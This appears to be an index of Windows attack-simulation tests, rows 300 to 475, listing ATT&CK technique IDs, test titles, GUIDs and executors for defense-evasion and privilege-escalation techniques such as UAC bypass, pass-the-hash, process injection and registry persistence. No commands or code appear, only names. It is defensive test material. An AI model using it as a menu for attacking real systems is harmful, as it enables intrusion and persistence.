300 defense-evasion T1036.003 Masquerading: Rename System Utilities 9 File Extension Masquerading c7fa0c3b-b57f-4cba-9118-863bf4e653fc command_prompt
301 defense-evasion T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
302 defense-evasion T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm 1 Regasm Uninstall Method Call Test 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 command_prompt
303 defense-evasion T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm 2 Regsvcs Uninstall Method Call Test fd3c1c6a-02d2-4b72-82d9-71c527abb126 powershell
304 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 4 Install root CA on Windows 76f49d86-5eb1-461a-a032-a480f86652f1 powershell
305 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 5 Install root CA on Windows with certutil 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f powershell
306 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 6 Add Root Certificate to CurrentUser Certificate Store ca20a3f1-42b5-4e21-ad3f-1049199ec2e0 powershell
307 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 1 Compile After Delivery using csc.exe ffcdbd6a-b0e8-487d-927a-09127fe9a206 command_prompt
308 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 2 Dynamic C# Compile 453614d8-3ba6-4147-acc0-7ec4b3e1faef powershell
309 defense-evasion T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
310 defense-evasion T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
311 defense-evasion T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
312 defense-evasion T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
313 defense-evasion T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild 1 MSBuild Bypass Using Inline Tasks (C#) 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
314 defense-evasion T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild 2 MSBuild Bypass Using Inline Tasks (VB) ab042179-c0c5-402f-9bc8-42741f5ce359 command_prompt
315 defense-evasion T1564.003 Hide Artifacts: Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
316 defense-evasion T1027.006 HTML Smuggling 1 HTML Smuggling Remote Payload 30cbeda4-08d9-42f1-8685-197fad677734 powershell
317 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 4 Delete a single file - Windows cmd 861ea0b4-708a-4d17-848d-186c9c7f17e3 command_prompt
318 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 5 Delete an entire folder - Windows cmd ded937c4-2add-42f7-9c2c-c742b7a98698 command_prompt
319 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 6 Delete a single file - Windows PowerShell 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 powershell
320 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 7 Delete an entire folder - Windows PowerShell edd779e4-a509-4cba-8dfa-a112543dbfb1 powershell
321 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 9 Delete Prefetch File 36f96049-0ad7-4a5f-8418-460acaeb92fb powershell
322 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 10 Delete TeamViewer Log Files 69f50a5f-967c-4327-a5bb-e1a9a9983785 powershell
323 defense-evasion T1221 Template Injection 1 WINWORD Remote Template Injection 1489e08a-82c7-44ee-b769-51b72d03521d command_prompt
324 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
325 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
326 defense-evasion T1550.002 Use Alternate Authentication Material: Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
327 defense-evasion T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
328 defense-evasion T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
329 defense-evasion T1220 XSL Script Processing 1 MSXSL Bypass using local files ca23bfb2-023f-49c5-8802-e66997de462d command_prompt
330 defense-evasion T1220 XSL Script Processing 2 MSXSL Bypass using remote files a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 command_prompt
331 defense-evasion T1220 XSL Script Processing 3 WMIC bypass using local XSL file 1b237334-3e21-4a0c-8178-b8c996124988 command_prompt
332 defense-evasion T1220 XSL Script Processing 4 WMIC bypass using remote XSL file 7f5be499-33be-4129-a560-66021f379b9b command_prompt
333 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 3 Create Windows System File with Attrib f70974c8-c094-4574-b542-2c545af95a32 command_prompt
334 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 4 Create Windows Hidden File with Attrib dadb792e-4358-4d8d-9207-b771faa0daa5 command_prompt
335 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 8 Hide Files Through Registry f650456b-bd49-4bc1-ae9d-271b5b9581e7 command_prompt
336 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 1 Alternate Data Streams (ADS) 8822c3b0-d9f9-4daf-a043-49f4602364f4 command_prompt
337 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 2 Store file in Alternate Data Stream (ADS) 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 powershell
338 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 3 Create ADS command prompt 17e7637a-ddaf-4a82-8622-377e20de8fdb command_prompt
339 defense-evasion T1564.004 Hide Artifacts: NTFS File Attributes 4 Create ADS PowerShell 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 powershell
340 defense-evasion T1055.001 Process Injection: Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
341 defense-evasion T1055.001 Process Injection: Dynamic-link Library Injection 2 WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5 powershell
342 defense-evasion T1216 Signed Script Proxy Execution 1 SyncAppvPublishingServer Signed Script PowerShell Command Execution 275d963d-3f36-476c-8bef-a2a3960ee6eb command_prompt
343 defense-evasion T1216 Signed Script Proxy Execution 2 manage-bde.wsf Signed Script Command Execution 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a command_prompt
344 defense-evasion T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
345 defense-evasion T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
346 defense-evasion T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
347 defense-evasion T1127 Trusted Developer Utilities Proxy Execution 1 Lolbin Jsc.exe compile javascript to exe 1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8 command_prompt
348 defense-evasion T1127 Trusted Developer Utilities Proxy Execution 2 Lolbin Jsc.exe compile javascript to dll 3fc9fea2-871d-414d-8ef6-02e85e322b80 command_prompt
349 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
350 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
351 defense-evasion T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
352 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
353 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
354 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
355 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
356 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
357 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
358 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
359 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
360 privilege-escalation T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
361 privilege-escalation T1546.013 Event Triggered Execution: PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
362 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
363 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
364 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
365 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
366 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
367 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
368 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
369 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
370 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
371 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
372 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
373 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
374 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
375 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
376 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
377 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
378 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
379 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 18 WinPwn - UAC Magic 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc powershell
380 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 19 WinPwn - UAC Bypass ccmstp technique f3c145f9-3c8d-422c-bd99-296a17a8f567 powershell
381 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 20 WinPwn - UAC Bypass DiskCleanup technique 1ed67900-66cd-4b09-b546-2a0ef4431a0c powershell
382 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 21 WinPwn - UAC Bypass DccwBypassUAC technique 2b61977b-ae2d-4ae4-89cb-5c36c89586be powershell
383 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key 251c5936-569f-42f4-9ac2-87a173b9e9b8 powershell
384 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 23 UAC Bypass with WSReset Registry Modification 3b96673f-9c92-40f1-8a3e-ca060846f8d9 powershell
385 privilege-escalation T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
386 privilege-escalation T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
387 privilege-escalation T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
388 privilege-escalation T1547.014 Active Setup 1 HKLM - Add atomic_test key to launch executable as part of user setup deff4586-0517-49c2-981d-bbea24d48d71 powershell
389 privilege-escalation T1547.014 Active Setup 2 HKLM - Add malicious StubPath value to existing Active Setup Entry 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a powershell
390 privilege-escalation T1547.014 Active Setup 3 HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number 04d55cef-f283-40ba-ae2a-316bc3b5e78c powershell
391 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
392 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
393 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
394 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
395 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 5 Remote Service Installation CMD fb4151a2-db33-4f8c-b7f8-78ea8790f961 command_prompt
396 privilege-escalation T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
397 privilege-escalation T1055.003 Thread Execution Hijacking 1 Thread Execution Hijacking 578025d5-faa9-4f6d-8390-aae527d503e1 powershell
398 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
399 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
400 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
401 privilege-escalation T1547.010 Boot or Logon Autostart Execution: Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
402 privilege-escalation T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
403 privilege-escalation T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
404 privilege-escalation T1055 Process Injection 3 Section View Injection c6952f41-6cf0-450a-b352-2ca8dae7c178 powershell
405 privilege-escalation T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
406 privilege-escalation T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
407 privilege-escalation T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
408 privilege-escalation T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
409 privilege-escalation T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
410 privilege-escalation T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
411 privilege-escalation T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
412 privilege-escalation T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
413 privilege-escalation T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
414 privilege-escalation T1547.003 Time Providers 2 Edit an existing time provider 29e0afca-8d1d-471a-8d34-25512fc48315 powershell
415 privilege-escalation T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
416 privilege-escalation T1134.002 Create Process with Token 2 WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique ccf4ac39-ec93-42be-9035-90e2f26bcd92 powershell
417 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
418 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
419 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
420 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 4 Winlogon HKLM Shell Key Persistence - PowerShell 95a3c42f-8c88-4952-ad60-13b81d929a9d powershell
421 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 5 Winlogon HKLM Userinit Key Persistence - PowerShell f9b8daff-8fa7-4e6a-a1a7-7c14675a545b powershell
422 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
423 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
424 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
425 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
426 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
427 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 3 Create Symbolic Link From osk.exe to cmd.exe 51ef369c-5e87-4f33-88cd-6d61be63edf2 command_prompt
428 privilege-escalation T1055.004 Process Injection: Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
429 privilege-escalation T1546.009 Event Triggered Execution: AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
430 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
431 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
432 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 3 Launch NSudo Executable 7be1bc0f-d8e5-4345-9333-f5f67d742cb9 powershell
433 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 4 Bad Potato 9c6d799b-c111-4749-a42f-ec2f8cb51448 powershell
434 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription - CommandLineEventConsumer 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
435 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 2 Persistence via WMI Event Subscription - ActiveScriptEventConsumer fecd0dfd-fb55-45fa-a10b-6250272d0832 powershell
436 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 3 Windows MOFComp.exe Load MOF File 29786d7e-8916-4de6-9c55-be7b093b2706 powershell
437 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
438 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
439 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
440 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
441 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
442 privilege-escalation T1546.001 Event Triggered Execution: Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
443 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
444 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
445 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
446 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
447 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
448 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
449 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
450 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
451 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
452 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 10 Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value acfef903-7662-447e-a391-9c91c2f00f7b powershell
453 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 11 Change Startup Folder - HKCU Modify User Shell Folders Startup Value 8834b65a-f808-4ece-ad7e-2acdf647aafa powershell
454 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 12 HKCU - Policy Settings Explorer Run Key a70faea1-e206-4f6f-8d9a-67379be8f6f1 powershell
455 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 13 HKLM - Policy Settings Explorer Run Key b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f powershell
456 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 HKLM - Append Command to Winlogon Userinit KEY Value f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 powershell
457 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 15 HKLM - Modify default System Shell - Winlogon Shell KEY Value 1d958c61-09c6-4d9e-b26b-4130314e520e powershell
458 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 16 secedit used to create a Run key in the HKLM Hive 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 command_prompt
459 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 17 Modify BootExecute Value befc2b40-d487-4a5a-8813-c11085fb5672 powershell
460 privilege-escalation T1055.012 Process Injection: Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
461 privilege-escalation T1055.012 Process Injection: Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
462 privilege-escalation T1546 Event Triggered Execution 1 Persistence with Custom AutodialDLL aca9ae16-7425-4b6d-8c30-cad306fdbd5b powershell
463 privilege-escalation T1546 Event Triggered Execution 2 HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) a574dafe-a903-4cce-9701-14040f4f3532 powershell
464 privilege-escalation T1546 Event Triggered Execution 3 HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 powershell
465 privilege-escalation T1546 Event Triggered Execution 4 WMI Invoke-CimMethod Start Process adae83d3-0df6-45e7-b2c3-575f91584577 powershell
466 privilege-escalation T1134.005 Access Token Manipulation: SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
467 privilege-escalation T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
468 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
469 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
470 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
471 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
472 privilege-escalation T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
473 privilege-escalation T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
474 privilege-escalation T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
475 privilege-escalation T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
